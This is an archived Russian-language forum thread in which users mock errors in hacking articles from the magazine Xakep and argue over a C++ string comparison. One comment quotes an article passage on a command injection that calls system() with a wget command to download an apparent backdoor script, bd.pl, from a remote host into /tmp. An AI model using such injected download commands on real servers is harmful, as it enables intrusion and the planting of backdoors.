LINUX.ORG.RU
ФорумTalks

Пара ляпов из Хакера :))


0

0

Вчера решил зайти на сайт этого интересного журнала, почитать что-нибудь интересное :)) И вот в двух статьях, повествующих про взломы различных сайтов мое внимание привлекли следующие забавные перлы:

"После того, как мы увидели хеши админов форума в кодировке MD5..." (http://www.xakep.ru/post/24136/default.asp)

А вот кусок кода (http://www.xakep.ru/post/24910/default.asp) после, которого я даже подумал, что это просто шутка:

if (s_cmd == "exit"){ exit(0); }

Вот такой вот журнальчик ;)) Забавный )) Сейчас, вот думаю, может подписаться на их рассылку? :-))

★★★★★

нарочно не придумаешь :)

anonymous
()

> if (s_cmd == "exit"){ exit(0); }

Пардон может я что то упустил (просто exit никогда не пользовал) а что тут не так ???

cyclon ★★★★★
()

а что, никто не заметил что s_cmd - это stl-ная string для которой операция == применима ?

anonymous
()
Ответ на: комментарий от cyclon

1) strcmp
2) ну и нах потом новый блок начинать если там только одна комманда?
3) настоящие прогеры пользуют принтф и не жужжат сиаутами.

linux_newbe
()

> if (s_cmd == "exit"){ exit(0); }

фиг знает, но сравнение указателей никто не запрещает в C

lg ★★
()
Ответ на: комментарий от Sun-ch

А там очень много косяков. Просто журнал издается под эгидой отдела Р, и чтобы применять описанные в нем способы взлома, надо пошевелить мозгой и исправить ошибки. Это дает гарантию того, что недоумок хакером не станет. И сплоиты они описывают прокисшие, и программулины под знаком "ну дальше просто, допиши сам".

anonymous
()
Ответ на: комментарий от Sun-ch

в любом случае даже если это C то код имеет право на жизнь, вот что я хотел сказать .. нет я не защищаю того кто его писал и мне побольшому счету пофиг, просто сам факт существования такого кода не считаю ляпом, хотя по большому счету он не имеет пользы большой ..

lg ★★
()
Ответ на: комментарий от anonymous

Ведущий (растягивая гласные и прочие): Так кто-же победит в опросе "Ла-а-а-а-амерезм или головоломка"?
1 -- журна-а-а-а-ал "хакир"
2 -- Серж Голубиц-ц-ц-ц-цкий
или
3 -- LOR talks?

anonymous
()

php-coder, дураком ты себя показал, больше ничего

вот это тебе знакомо?
using namespace std;
string s_cmd;

hapchu ★★
()

А вот еще один:

"Чтобы сделать это, надо было вызвать system() с параметром "wget host.ru/bd.pl -O /tmp/bd.pl". Именно в кавычках - без них программа не загрузится. После того как я написал верный код, символ кавычек был заэкранирован слэшем. Я подумал, что это случайность и на самом деле код не пострадал. Но скрипт никак не хотел выполнять команду (ничего удивительного: просто gpc_magic_quotes=on - прим. ред.). Сложные конструкции с обходом system() ни к чему не приводили. Это казалось странным, ведь id без кавычек выполнялся на ура..."

http://www.xakep.ru//magazine/xa/068/046/2.asp

Ay49Mihas ★★★★
()
Ответ на: комментарий от hapchu

>php-coder, дураком ты себя показал, больше ничего

Быть может и так... признаю, что с кодом на С++ я и сам лапухнулся... :(( Я знаю Си и совсем чуток из С++, а там в коде непонятно вообщем на каком из языков написано: часть взято из плюсов, а функции вроде printf из С.

Хм... показал себя дураком... :(( ладно... главное остался тем кто есть, да и ляпы допускают все, а не только журнал Хакер))

>вот это тебе знакомо? using namespace std;

Да

>string s_cmd;

Теперь тоже знакомо... 8))

php-coder ★★★★★
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Talks